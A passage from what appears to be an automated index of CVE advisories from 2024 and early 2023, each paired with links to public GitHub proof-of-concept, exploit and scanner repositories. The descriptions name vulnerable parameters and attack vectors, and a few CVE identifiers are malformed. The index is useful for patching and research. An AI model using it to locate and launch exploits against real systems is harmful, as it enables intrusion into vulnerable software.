fs/splice.c:1164\n splice_direct_to_actor+0x438/0xa0c fs/splice.c:1108\n do_splice_direct_actor \n---truncated---
- [Abdurahmon3236/CVE-2024-44946](https://github.com/Abdurahmon3236/CVE-2024-44946)
### CVE-2024-44947 (2024-09-02)
In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: Initialize beyond-EOF page contents before setting uptodate\n\nfuse_notify_store(), unlike fuse_do_readpage(), does not enable page\nzeroing (because it can be used to change partial page contents).\n\nSo fuse_notify_store() must be more careful to fully initialize page\ncontents (including parts of the page that are beyond end-of-file)\nbefore marking the page uptodate.\n\nThe current code can leave beyond-EOF page contents uninitialized, which\nmakes these uninitialized page contents visible to userspace via mmap().\n\nThis is an information leak, but only affects systems which do not\nenable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or the\ncorresponding kernel command line parameter).
- [Abdurahmon3236/CVE-2024-44947](https://github.com/Abdurahmon3236/CVE-2024-44947)
### CVE-2024-45058 (2024-08-28)
i-Educar is free, fully online school management software that can be used by school secretaries, teachers, coordinators, and area managers. Prior to the 2.9 branch, an attacker with only minimal viewing privileges in the settings section is able to change their user type to Administrator (or another type with super-permissions) through a specifically crafted POST request to `/intranet/educar_usuario_cad.php`, modifying the `nivel_usuario_` parameter. The vulnerability occurs in the file located at `ieducar/intranet/educar_usuario_cad.php`, which does not check the user's current permission level before allowing changes. Commit c25910cdf11ab50e50162a49dd44bef544422b6e contains a patch for the issue.
- [0xbhsu/CVE-2024-45058](https://github.com/0xbhsu/CVE-2024-45058)
### CVE-2024-45200
- [latte-soft/kartlanpwn](https://github.com/latte-soft/kartlanpwn)
### CVE-2024-45241 (2024-08-26)
A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.
- [d4lyw/CVE-2024-45241](https://github.com/d4lyw/CVE-2024-45241)
- [verylazytech/CVE-2024-45241](https://github.com/verylazytech/CVE-2024-45241)
### CVE-2024-45244 (2024-08-25)
Hyperledger Fabric through 2.5.9 does not verify that a request has a timestamp within the expected time window.
- [shanker-sec/HLF_TxTime_spoofing](https://github.com/shanker-sec/HLF_TxTime_spoofing)
- [shanker-sec/hlf-time-oracle](https://github.com/shanker-sec/hlf-time-oracle)
### CVE-2024-45264 (2024-08-27)
A cross-site request forgery (CSRF) vulnerability in the admin panel in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to add a new administrator, leading to escalation of privileges.
- [TheHermione/CVE-2024-45264](https://github.com/TheHermione/CVE-2024-45264)
### CVE-2024-45265 (2024-08-26)
A SQL injection vulnerability in the poll component in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to execute arbitrary SQL commands via the psid parameter.
- [TheHermione/CVE-2024-45265](https://github.com/TheHermione/CVE-2024-45265)
### CVE-2024-45383 (2024-09-12)
A mishandling of IRP requests vulnerability exists in the HDAudBus_DMA interface of Microsoft High Definition Audio Bus Driver 10.0.19041.3636 (WinBuild.160101.0800). A specially crafted application can issue multiple IRP Complete requests which leads to a local denial-of-service. An attacker can execute malicious script/application to trigger this vulnerability.
- [SpiralBL0CK/CVE-2024-45383](https://github.com/SpiralBL0CK/CVE-2024-45383)
### CVE-2024-45409 (2024-09-10)
The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability is fixed in 1.17.0 and 1.12.3.
- [synacktiv/CVE-2024-45409](https://github.com/synacktiv/CVE-2024-45409)
### CVE-2024-45410
- [jphetphoumy/traefik-CVE-2024-45410-poc](https://github.com/jphetphoumy/traefik-CVE-2024-45410-poc)
### CVE-2024-45436 (2024-08-29)
extractFromZipFile in model.go in Ollama before 0.1.47 can extract members of a ZIP archive outside of the parent directory.
- [pankass/CVE-2024-45436](https://github.com/pankass/CVE-2024-45436)
### CVE-2024-45507 (2024-09-04)
Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: before 18.12.16.\n\nUsers are recommended to upgrade to version 18.12.16, which fixes the issue.
- [Avento/CVE-2024-45507_Behinder_Webshell](https://github.com/Avento/CVE-2024-45507_Behinder_Webshell)
### CVE-2024-45519
- [p33d/CVE-2024-45519](https://github.com/p33d/CVE-2024-45519)
- [Chocapikk/CVE-2024-45519](https://github.com/Chocapikk/CVE-2024-45519)
### CVE-2024-45589 (2024-09-05)
RapidIdentity LTS through 2023.0.2 and Cloud through 2024.08.0 improperly restricts excessive authentication attempts and allows a remote attacker to cause a denial of service via the username parameters.
- [BenRogozinski/CVE-2024-45589](https://github.com/BenRogozinski/CVE-2024-45589)
### CVE-2024-45614
- [ooooooo-q/puma_header_normalization-CVE-2024-45614](https://github.com/ooooooo-q/puma_header_normalization-CVE-2024-45614)
### CVE-2024-46209
- [h4ckr4v3n/CVE-2024-46209](https://github.com/h4ckr4v3n/CVE-2024-46209)
### CVE-2024-46256
- [barttran2k/POC_CVE-2024-46256](https://github.com/barttran2k/POC_CVE-2024-46256)
### CVE-2024-46278
- [ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover](https://github.com/ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover)
### CVE-2024-46310
- [UwUtisum/CVE-2024-46310](https://github.com/UwUtisum/CVE-2024-46310)
### CVE-2024-46377
- [vidura2/CVE-2024-46377](https://github.com/vidura2/CVE-2024-46377)
### CVE-2024-46451 (2024-09-16)
TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWiFiAclRules function via the desc parameter.
- [vidura2/CVE-2024-46451](https://github.com/vidura2/CVE-2024-46451)
### CVE-2024-46483
- [kn32/cve-2024-46483](https://github.com/kn32/cve-2024-46483)
### CVE-2024-46532
- [KamenRiderDarker/CVE-2024-46532](https://github.com/KamenRiderDarker/CVE-2024-46532)
### CVE-2024-46538
- [EQSTLab/CVE-2024-46538](https://github.com/EQSTLab/CVE-2024-46538)
### CVE-2024-46627
- [d4lyw/CVE-2024-46627](https://github.com/d4lyw/CVE-2024-46627)
### CVE-2024-46635
- [h1thub/CVE-2024-46635](https://github.com/h1thub/CVE-2024-46635)
### CVE-2024-46658
- [jackalkarlos/CVE-2024-46658](https://github.com/jackalkarlos/CVE-2024-46658)
### CVE-2024-46901
- [devhaozi/CVE-2024-46901](https://github.com/devhaozi/CVE-2024-46901)
### CVE-2024-46986
- [vidura2/CVE-2024-46986](https://github.com/vidura2/CVE-2024-46986)
### CVE-2024-47066
- [l8BL/CVE-2024-47066](https://github.com/l8BL/CVE-2024-47066)
### CVE-2024-47076
- [mutkus/CVE-2024-47076](https://github.com/mutkus/CVE-2024-47076)
### CVE-2024-47176
- [GO0dspeed/spill](https://github.com/GO0dspeed/spill)
- [workabhiwin09/CVE-2024-47176](https://github.com/workabhiwin09/CVE-2024-47176)
- [tonyarris/CVE-2024-47176-Scanner](https://github.com/tonyarris/CVE-2024-47176-Scanner)
- [mr-r3b00t/CVE-2024-47176](https://github.com/mr-r3b00t/CVE-2024-47176)
- [aytackalinci/CVE-2024-47176](https://github.com/aytackalinci/CVE-2024-47176)
- [lkarlslund/jugular](https://github.com/lkarlslund/jugular)
- [nma-io/CVE-2024-47176](https://github.com/nma-io/CVE-2024-47176)
- [l0n3m4n/CVE-2024-47176](https://github.com/l0n3m4n/CVE-2024-47176)
- [gumerzzzindo/CVE-2024-47176](https://github.com/gumerzzzindo/CVE-2024-47176)
- [MalwareTech/CVE-2024-47176-Scanner](https://github.com/MalwareTech/CVE-2024-47176-Scanner)
- [AxthonyV/CVE-2024-47176](https://github.com/AxthonyV/CVE-2024-47176)
- [gianlu111/CUPS-CVE-2024-47176](https://github.com/gianlu111/CUPS-CVE-2024-47176)
- [0x7556/CVE-2024-47176](https://github.com/0x7556/CVE-2024-47176)
### CVE-2024-47177
- [referefref/cupspot-2024-47177](https://github.com/referefref/cupspot-2024-47177)
### CVE-2024-47575
- [maybelookis/CVE-2024-47575](https://github.com/maybelookis/CVE-2024-47575)
- [HazeLook/CVE-2024-47575](https://github.com/HazeLook/CVE-2024-47575)
- [Jaden1419/CVE-2024-47575](https://github.com/Jaden1419/CVE-2024-47575)
- [hatvix1/CVE-2024-47575](https://github.com/hatvix1/CVE-2024-47575)
- [hazesecurity/CVE-2024-47575](https://github.com/hazesecurity/CVE-2024-47575)
- [groshi/CVE-2024-47575-POC](https://github.com/groshi/CVE-2024-47575-POC)
- [zgimszhd61/CVE-2024-47575-POC](https://github.com/zgimszhd61/CVE-2024-47575-POC)
- [ShawtyTwo/CVE-2024-47575](https://github.com/ShawtyTwo/CVE-2024-47575)
### CVE-2024-47854
- [MarioTesoro/CVE-2024-47854](https://github.com/MarioTesoro/CVE-2024-47854)
### CVE-2024-48063
- [zgimszhd61/CVE-2024-48063-poc](https://github.com/zgimszhd61/CVE-2024-48063-poc)
### CVE-2024-48217
- [ajrielrm/CVE-2024-48217](https://github.com/ajrielrm/CVE-2024-48217)
### CVE-2024-48359
- [OpenXP-Research/CVE-2024-48359](https://github.com/OpenXP-Research/CVE-2024-48359)
### CVE-2024-48360
- [OpenXP-Research/CVE-2024-48360](https://github.com/OpenXP-Research/CVE-2024-48360)
### CVE-2024-48392
- [Renzusclarke/CVE-2024-48392-PoC](https://github.com/Renzusclarke/CVE-2024-48392-PoC)
### CVE-2024-48415
- [khaliquesX/CVE-2024-48415](https://github.com/khaliquesX/CVE-2024-48415)
### CVE-2024-48427
- [vighneshnair7/CVE-2024-48427](https://github.com/vighneshnair7/CVE-2024-48427)
### CVE-2024-48569
- [MarioTesoro/CVE-2024-48569](https://github.com/MarioTesoro/CVE-2024-48569)
### CVE-2024-48605
- [surajhacx/HelakuruV.1.1-DLLHijack](https://github.com/surajhacx/HelakuruV.1.1-DLLHijack)
### CVE-2024-48644
- [rosembergpro/CVE-2024-48644](https://github.com/rosembergpro/CVE-2024-48644)
### CVE-2024-48652
- [paragbagul111/CVE-2024-48652](https://github.com/paragbagul111/CVE-2024-48652)
### CVE-2024-48733
- [ACN-CVEs/CVE-2024-48733](https://github.com/ACN-CVEs/CVE-2024-48733)
### CVE-2024-48734
- [ACN-CVEs/CVE-2024-48734](https://github.com/ACN-CVEs/CVE-2024-48734)
### CVE-2024-48735
- [ACN-CVEs/CVE-2024-48735](https://github.com/ACN-CVEs/CVE-2024-48735)
### CVE-2024-48904
- [zetraxz/CVE-2024-48904](https://github.com/zetraxz/CVE-2024-48904)
### CVE-2024-48914
- [EQSTLab/CVE-2024-48914](https://github.com/EQSTLab/CVE-2024-48914)
### CVE-2024-48955
- [BrotherOfJhonny/CVE-2024-48955_Overview](https://github.com/BrotherOfJhonny/CVE-2024-48955_Overview)
### CVE-2024-50550
- [AleksaZatezalo/CVE-2024-50550](https://github.com/AleksaZatezalo/CVE-2024-50550)
### CVE-2024-51378
- [refr4g/CVE-2024-51378](https://github.com/refr4g/CVE-2024-51378)
### CVE-2024-51430
- [BLACK-SCORP10/CVE-2024-51430](https://github.com/BLACK-SCORP10/CVE-2024-51430)
### CVE-2024-51435
- [bevennyamande/CVE-2024-51435](https://github.com/bevennyamande/CVE-2024-51435)
### CVE-2024-51567
- [ajayalf/CVE-2024-51567](https://github.com/ajayalf/CVE-2024-51567)
### CVE-2024-1642470
- [Symbolexe/CVE-2024-1642470](https://github.com/Symbolexe/CVE-2024-1642470)
## 2023
### CVE-2023-0045 (2023-04-25)
The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall. The ib_prctl_set function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bits are checked. This leaves the victim vulnerable to values already injected on the BTB, prior to the prctl syscall. The patch that added the support for the conditional mitigation via prctl (ib_prctl_set) dates back to the kernel 4.9.176.\n\nWe recommend upgrading past commit a664ec9158eeddd75121d39c9a0758016097fa96\n\n
- [ASkyeye/CVE-2023-0045](https://github.com/ASkyeye/CVE-2023-0045)
- [es0j/CVE-2023-0045](https://github.com/es0j/CVE-2023-0045)
### CVE-2023-0099 (2023-02-13)
The Simple URLs WordPress plugin before 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
- [amirzargham/CVE-2023-0099-exploit](https://github.com/amirzargham/CVE-2023-0099-exploit)
### CVE-2023-0156 (2023-04-10)
The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not limit what log files to display in it's settings pages, allowing an authorized user (admin+) to view the contents of arbitrary files and list directories anywhere on the server (to which the web server has access). The plugin only displays the last 50 lines of the file.
- [b0marek/CVE-2023-0156](https://github.com/b0marek/CVE-2023-0156)
### CVE-2023-0157 (2023-04-10)
The All-In-One Security (AIOS) WordPress plugin before 5.1.5 does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page.
- [b0marek/CVE-2023-0157](https://github.com/b0marek/CVE-2023-0157)
### CVE-2023-0159 (2023-02-13)
The Extensive VC Addons for WPBakery page builder WordPress plugin before 1.9.1 does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
- [im-hanzou/EVCer](https://github.com/im-hanzou/EVCer)
### CVE-2023-0179 (2023-03-27)
A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution.
- [TurtleARM/CVE-2023-0179-PoC](https://github.com/TurtleARM/CVE-2023-0179-PoC)
- [H4K6/CVE-2023-0179-PoC](https://github.com/H4K6/CVE-2023-0179-PoC)
### CVE-2023-0264 (2023-08-04)
A flaw was found in Keycloaks OpenID Connect user authentication, which may incorrectly authenticate requests. An authenticated attacker who could obtain information from a user request within the same realm could use that data to impersonate the victim and generate new session tokens. This issue could impact confidentiality, integrity, and availability.
- [twwd/CVE-2023-0264](https://github.com/twwd/CVE-2023-0264)
### CVE-2023-0266 (2023-01-30)
A use after free vulnerability exists in the ALSA PCM package in the Linux Kernel. SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 is missing locks that can be used in a use-after-free that can result in a priviledge escalation to gain ring0 access from the system user. We recommend upgrading past commit 56b88b50565cd8b946a2d00b0c83927b7ebb055e\n
- [SeanHeelan/claude_opus_cve_2023_0266](https://github.com/SeanHeelan/claude_opus_cve_2023_0266)
### CVE-2023-0297 (2023-01-14)
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
- [bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad](https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad)
- [Small-ears/CVE-2023-0297](https://github.com/Small-ears/CVE-2023-0297)
- [JacobEbben/CVE-2023-0297](https://github.com/JacobEbben/CVE-2023-0297)
- [overgrowncarrot1/CVE-2023-0297](https://github.com/overgrowncarrot1/CVE-2023-0297)
- [btar1gan/exploit_CVE-2023-0297](https://github.com/btar1gan/exploit_CVE-2023-0297)
- [S4MY9/CVE-2023-0297](https://github.com/S4MY9/CVE-2023-0297)
### CVE-2023-0315 (2023-01-16)
Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.
- [mhaskar/CVE-2023-0315](https://github.com/mhaskar/CVE-2023-0315)
### CVE-2023-0386 (2023-03-22)
A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.
- [veritas501/CVE-2023-0386](https://github.com/veritas501/CVE-2023-0386)
- [Satheesh575555/linux-4.19.72_CVE-2023-0386](https://github.com/Satheesh575555/linux-4.19.72_CVE-2023-0386)
- [xkaneiki/CVE-2023-0386](https://github.com/xkaneiki/CVE-2023-0386)
- [chenaotian/CVE-2023-0386](https://github.com/chenaotian/CVE-2023-0386)
- [3yujw7njai/CVE-2023-0386](https://github.com/3yujw7njai/CVE-2023-0386)
- [hshivhare67/kernel_v4.19.72_CVE-2023-0386](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0386)
- [sxlmnwb/CVE-2023-0386](https://github.com/sxlmnwb/CVE-2023-0386)
- [Fanxiaoyao66/CVE-2023-0386](https://github.com/Fanxiaoyao66/CVE-2023-0386)
- [puckiestyle/CVE-2023-0386](https://github.com/puckiestyle/CVE-2023-0386)
- [letsr00t/CVE-2023-0386](https://github.com/letsr00t/CVE-2023-0386)
- [churamanib/CVE-2023-0386](https://github.com/churamanib/CVE-2023-0386)
- [EstamelGG/CVE-2023-0386-libs](https://github.com/EstamelGG/CVE-2023-0386-libs)
### CVE-2023-0400 (2023-02-01)
\nThe protection bypass vulnerability in DLP for Windows 11.9.x is addressed in version 11.10.0. This allowed a local user to bypass DLP controls when uploading sensitive data from a mapped drive into a web email client. Loading from a local driver was correctly prevented. Versions prior to 11.9 correctly detected and blocked the attempted upload of sensitive data.\n\n
- [pinpinsec/CVE-2023-0400](https://github.com/pinpinsec/CVE-2023-0400)
### CVE-2023-0461 (2023-02-28)
There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.\n\nThere is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock.\n\nWhen CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable.\n\nThe setsockopt TCP_ULP operation does not require any privilege.\n\nWe recommend upgrading past commit 2c02d41d71f90a5168391b6a5f2954112ba2307c
- [hshivhare67/kernel_v4.19.72_CVE-2023-0461](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2023-0461)
### CVE-2023-0464 (2023-03-22)
A security vulnerability has been identified in all supported versions\n\nof OpenSSL related to the verification of X.509 certificate chains\nthat include policy constraints. Attackers may be able to exploit this\nvulnerability by creating a malicious certificate chain that triggers\nexponential use of computational resources, leading to a denial-of-service\n(DoS) attack on affected systems.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy' argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()' function.
- [Trinadh465/Openssl_1.1.1g_CVE-2023-0464](https://github.com/Trinadh465/Openssl_1.1.1g_CVE-2023-0464)
### CVE-2023-0630 (2023-03-20)
The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.
- [RandomRobbieBF/CVE-2023-0630](https://github.com/RandomRobbieBF/CVE-2023-0630)
### CVE-2023-0656 (2023-03-02)
A Stack-based buffer overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash.
- [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656)
### CVE-2023-0669 (2023-02-06)
Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. This issue was patched in version 7.1.2.
- [0xf4n9x/CVE-2023-0669](https://github.com/0xf4n9x/CVE-2023-0669)
- [cataliniovita/CVE-2023-0669](https://github.com/cataliniovita/CVE-2023-0669)
- [Griffin-01/CVE-2023-0669](https://github.com/Griffin-01/CVE-2023-0669)
- [yosef0x01/CVE-2023-0669-Analysis](https://github.com/yosef0x01/CVE-2023-0669-Analysis)
- [Avento/CVE-2023-0669](https://github.com/Avento/CVE-2023-0669)
### CVE-2023-0748 (2023-02-08)
Open Redirect in GitHub repository btcpayserver/btcpayserver prior to 1.7.6.\n\n
- [gonzxph/CVE-2023-0748](https://github.com/gonzxph/CVE-2023-0748)
### CVE-2023-08
- [amirzargham/CVE-2023-08-21-exploit](https://github.com/amirzargham/CVE-2023-08-21-exploit)
### CVE-2023-0830 (2023-02-14)
Es wurde eine kritische Schwachstelle in EasyNAS 1.1.0 entdeckt. Es betrifft die Funktion system der Datei /backup.pl. Durch Manipulation mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [xbz0n/CVE-2023-0830](https://github.com/xbz0n/CVE-2023-0830)
### CVE-2023-0860 (2023-02-16)
Improper Restriction of Excessive Authentication Attempts in GitHub repository modoboa/modoboa-installer prior to 2.0.4.
- [0xsu3ks/CVE-2023-0860](https://github.com/0xsu3ks/CVE-2023-0860)
### CVE-2023-0861 (2023-02-16)
NetModule NSRW web administration interface executes an OS command constructed with unsanitized user input. A successful exploit could allow an authenticated user to execute arbitrary commands with elevated privileges.\nThis issue affects NSRW: from 4.3.0.0 before 4.3.0.119, from 4.4.0.0 before 4.4.0.118, from 4.6.0.0 before 4.6.0.105, from 4.7.0.0 before 4.7.0.103.\n\n
- [seifallahhomrani1/CVE-2023-0861-POC](https://github.com/seifallahhomrani1/CVE-2023-0861-POC)
### CVE-2023-422
- [HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE](https://github.com/HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE)
### CVE-2023-1112 (2023-03-01)
Es wurde eine kritische Schwachstelle in Drag and Drop Multiple File Upload Contact Form 7 5.0.6.1 für WordPress ausgemacht. Es geht dabei um eine nicht klar definierte Funktion der Datei admin-ajax.php. Durch Manipulation des Arguments upload_name mit unbekannten Daten kann eine relative path traversal-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal](https://github.com/Nickguitar/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal)
### CVE-2023-1177 (2023-03-24)
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.2.1.\n\n
- [hh-hunter/ml-CVE-2023-1177](https://github.com/hh-hunter/ml-CVE-2023-1177)
- [iumiro/CVE-2023-1177-MLFlow](https://github.com/iumiro/CVE-2023-1177-MLFlow)
- [tiyeume25112004/CVE-2023-1177-rebuild](https://github.com/tiyeume25112004/CVE-2023-1177-rebuild)
- [saimahmed/MLflow-Vuln](https://github.com/saimahmed/MLflow-Vuln)
- [charlesgargasson/CVE-2023-1177](https://github.com/charlesgargasson/CVE-2023-1177)
### CVE-2023-1326 (2023-04-13)
A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.
- [diego-tella/CVE-2023-1326-PoC](https://github.com/diego-tella/CVE-2023-1326-PoC)
- [Pol-Ruiz/CVE-2023-1326](https://github.com/Pol-Ruiz/CVE-2023-1326)
- [h3xcr4ck3r/CVE-2023-1326](https://github.com/h3xcr4ck3r/CVE-2023-1326)
- [cve-2024/CVE-2023-1326-PoC](https://github.com/cve-2024/CVE-2023-1326-PoC)
### CVE-2023-1337 (2023-03-10)
The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the clear_uucss_logs function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete plugin log files.
- [Penkyzduyi/CVE-2023-1337](https://github.com/Penkyzduyi/CVE-2023-1337)
### CVE-2023-1389 (2023-03-15)
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
- [Voyag3r-Security/CVE-2023-1389](https://github.com/Voyag3r-Security/CVE-2023-1389)
- [Terminal1337/CVE-2023-1389](https://github.com/Terminal1337/CVE-2023-1389)
### CVE-2023-1415 (2023-03-15)
In Simple Art Gallery 1.0 wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Das betrifft die Funktion sliderPicSubmit der Datei adminHome.php. Mit der Manipulation mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden.
- [0xxtoby/CVE-2023-1415](https://github.com/0xxtoby/CVE-2023-1415)
### CVE-2023-1430 (2023-06-09)
The FluentCRM - Marketing Automation For WordPress plugin for WordPress is vulnerable to unauthorized modification of data in versions up to, and including, 2.7.40 due to the use of an MD5 hash without a salt to control subscriptions. This makes it possible for unauthenticated attackers to unsubscribe users from lists and manage subscriptions, granted they gain access to any targeted subscribers email address.
- [karlemilnikka/CVE-2023-1430](https://github.com/karlemilnikka/CVE-2023-1430)
### CVE-2023-1454 (2023-03-17)
Es wurde eine Schwachstelle in jeecg-boot 3.5.0 entdeckt. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Datei jmreport/qurestSql. Durch Beeinflussen des Arguments apiSelectId mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
- [gobysec/CVE-2023-1454](https://github.com/gobysec/CVE-2023-1454)
- [cjybao/CVE-2023-1454](https://github.com/cjybao/CVE-2023-1454)
- [3yujw7njai/CVE-2023-1454-EXP](https://github.com/3yujw7njai/CVE-2023-1454-EXP)
- [BugFor-Pings/CVE-2023-1454](https://github.com/BugFor-Pings/CVE-2023-1454)
- [padbergpete47/CVE-2023-1454](https://github.com/padbergpete47/CVE-2023-1454)
- [Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln](https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln)
- [shad0w0sec/CVE-2023-1454-EXP](https://github.com/shad0w0sec/CVE-2023-1454-EXP)
### CVE-2023-1488 (2023-03-18)
Es wurde eine Schwachstelle in Lespeed WiseCleaner Wise System Monitor 1.5.3.54 gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion 0x9C40A0D8/0x9C40A0DC/0x9C40A0E0 in der Bibliothek WiseHDInfo64.dll der Komponente IoControlCode Handler. Durch Manipulieren mit unbekannten Daten kann eine denial of service-Schwachstelle ausgenutzt werden. Der Angriff hat dabei lokal zu erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [bxtshit/CVE-2023-1488](https://github.com/bxtshit/CVE-2023-1488)
### CVE-2023-1498 (2023-03-19)
Es wurde eine kritische Schwachstelle in code-projects Responsive Hotel Site 1.0 entdeckt. Dabei betrifft es einen unbekannter Codeteil der Datei messages.php der Komponente Newsletter Log Handler. Durch Beeinflussen des Arguments title mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [Decemberus/BugHub](https://github.com/Decemberus/BugHub)
### CVE-2023-1665 (2023-03-27)
Improper Restriction of Excessive Authentication Attempts in GitHub repository linagora/twake prior to 0.0.0.
- [0xsu3ks/CVE-2023-1665](https://github.com/0xsu3ks/CVE-2023-1665)
### CVE-2023-1671 (2023-04-04)
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
- [ohnonoyesyes/CVE-2023-1671](https://github.com/ohnonoyesyes/CVE-2023-1671)
- [W01fh4cker/CVE-2023-1671-POC](https://github.com/W01fh4cker/CVE-2023-1671-POC)
- [csffs/cve-2023-1671](https://github.com/csffs/cve-2023-1671)
### CVE-2023-1698 (2023-05-15)
In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise.
- [Chocapikk/CVE-2023-1698](https://github.com/Chocapikk/CVE-2023-1698)
- [deIndra/CVE-2023-1698](https://github.com/deIndra/CVE-2023-1698)
- [thedarknessdied/WAGO-CVE-2023-1698](https://github.com/thedarknessdied/WAGO-CVE-2023-1698)
### CVE-2023-1718 (2023-11-01)
\nImproper file stream access in /desktop_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted "tmp_url".\n\n\n\n\n\n
- [jhonnybonny/Bitrix24DoS](https://github.com/jhonnybonny/Bitrix24DoS)
### CVE-2023-1767 (2023-04-20)
The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to a stored XSS prior to 28th March 2023. A feature of Snyk Advisor is to display the contents of a scanned package's Readme on its package health page. An attacker could create a package in NPM with an associated markdown README file containing XSS-able HTML tags. Upon Snyk Advisor importing the package, the XSS would run each time an end user browsed to the package's page on Snyk Advisor.
- [weizman/CVE-2023-1767](https://github.com/weizman/CVE-2023-1767)
### CVE-2023-1773 (2023-03-31)
